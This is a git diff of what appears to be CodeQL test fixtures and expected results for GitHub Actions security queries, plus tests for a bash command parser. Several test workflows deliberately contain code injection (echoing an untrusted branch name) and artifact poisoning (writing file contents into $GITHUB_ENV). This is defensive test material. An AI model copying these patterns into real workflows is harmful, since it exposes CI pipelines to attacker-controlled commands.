ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml new file mode 100644 index 000000000000..5e391db21aa6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml @@ -0,0 +1,13 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + branches-ignore: ["foo"] + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 207fb3abf01b..61c851a2cfa8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -447,6 +447,7 @@ nodes | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | @@ -566,4 +567,4 @@ subpaths | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e5ad46888522..db8e7b485d76 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -447,6 +447,7 @@ nodes | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | @@ -490,3 +491,4 @@ subpaths | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml index 130668b8515d..e4845a6f2f16 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml @@ -18,8 +18,7 @@ jobs: - name: Env Var Injection run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" - ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" - ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" echo "EOF" >> "${GITHUB_ENV}" diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml index 7c255e7722d8..67209267b5c5 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml @@ -18,7 +18,7 @@ jobs: - run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 74edee72f5f1..985af04112af 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -13,8 +13,8 @@ edges | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | @@ -44,9 +44,9 @@ nodes | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | @@ -67,8 +67,8 @@ subpaths | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 079a89a498c5..e1532c06cdc8 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -13,8 +13,8 @@ edges | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | @@ -44,9 +44,9 @@ nodes | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index f20fdc798291..85b937653249 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -31,7 +31,7 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:22:40 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | From 531f3d40c010be1d03f114f82ac7643350d311ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:35:09 +0200 Subject: [PATCH 562/707] Add tests for new bash parser --- .../.github/workflows/commands.yml | 21 ++ ql/test/library-tests/commands.expected | 206 ++++++++++++++++++ ql/test/library-tests/commands.ql | 4 + .../library-tests/poisonable_steps.expected | 2 - 4 files changed, 231 insertions(+), 2 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/commands.yml create mode 100644 ql/test/library-tests/commands.expected create mode 100644 ql/test/library-tests/commands.ql diff --git a/ql/test/library-tests/.github/workflows/commands.yml b/ql/test/library-tests/.github/workflows/commands.yml new file mode 100644 index 000000000000..11ef1a60d312 --- /dev/null +++ b/ql/test/library-tests/.github/workflows/commands.yml @@ -0,0 +1,21 @@ +on: push + +jobs: + local_commands: + runs-on: ubuntu-latest + steps: + - run: | + command1 ; command2 + - run: | + command3 | command4 + - run: | + command5 "$(command6)" + - run: | + command7 && command8 + - run: | + command9 || command10 + - run: | + command11 "`command12`" + - run: | + command13 "`command14` $(date | wc -l)" + diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected new file mode 100644 index 000000000000..17b8b982a713 --- /dev/null +++ b/ql/test/library-tests/commands.expected @@ -0,0 +1,206 @@ +| .github/workflows/commands.yml:7:9:9:6 | Run Step | command1 | +| .github/workflows/commands.yml:7:9:9:6 | Run Step | command2 | +| .github/workflows/commands.yml:9:9:11:6 | Run Step | command3 | +| .github/workflows/commands.yml:9:9:11:6 | Run Step | command4 | +| .github/workflows/commands.yml:11:9:13:6 | Run Step | command5 "SUBCOMMAND" | +| .github/workflows/commands.yml:11:9:13:6 | Run Step | command6 | +| .github/workflows/commands.yml:13:9:15:6 | Run Step | command7 | +| .github/workflows/commands.yml:13:9:15:6 | Run Step | command8 | +| .github/workflows/commands.yml:15:9:17:6 | Run Step | command9 | +| .github/workflows/commands.yml:15:9:17:6 | Run Step | command10 | +| .github/workflows/commands.yml:17:9:19:6 | Run Step | command11 "SUBCOMMAND" | +| .github/workflows/commands.yml:17:9:19:6 | Run Step | command12 | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | command13 "SUBCOMMAND SUBCOMMAND" | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | command14 | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | date | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | wc -l | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< event.json | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat | +| 